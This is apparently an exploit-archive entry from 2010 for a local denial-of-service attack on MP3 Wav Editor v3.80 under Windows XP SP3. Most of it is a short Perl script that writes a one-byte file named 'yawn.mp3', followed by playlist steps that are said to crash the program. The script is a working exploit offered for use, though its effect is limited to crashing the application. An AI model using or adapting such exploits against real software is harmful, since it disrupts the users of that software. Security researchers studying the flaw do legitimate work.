id: 11642
date: 04/05/2010
title: MP3 Wav Editor v3.80 .mp3 Local DoS
author: chap0
cves: 

===================================
MP3 Wav Editor v3.80 .mp3 Local DoS
===================================

# Exploit Title: MP3WavEditor Local DoS .mp3
# Date: April 5, 2010
# Software Link: [http://www.mp3waveditor.com/index.htm]
# Version: 3.80
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
#
#
#!/usr/bin/perl
 
my $file = "yawn.mp3";
my $_a = "\x41";
 
open (FILE, ">$file");
print FILE "$_a";
 
print "Usage: Make playlist -> Add mp3 -> Delete Playlist -> Recreate same playlist\n";



#  0day.today [2023-03-27]  #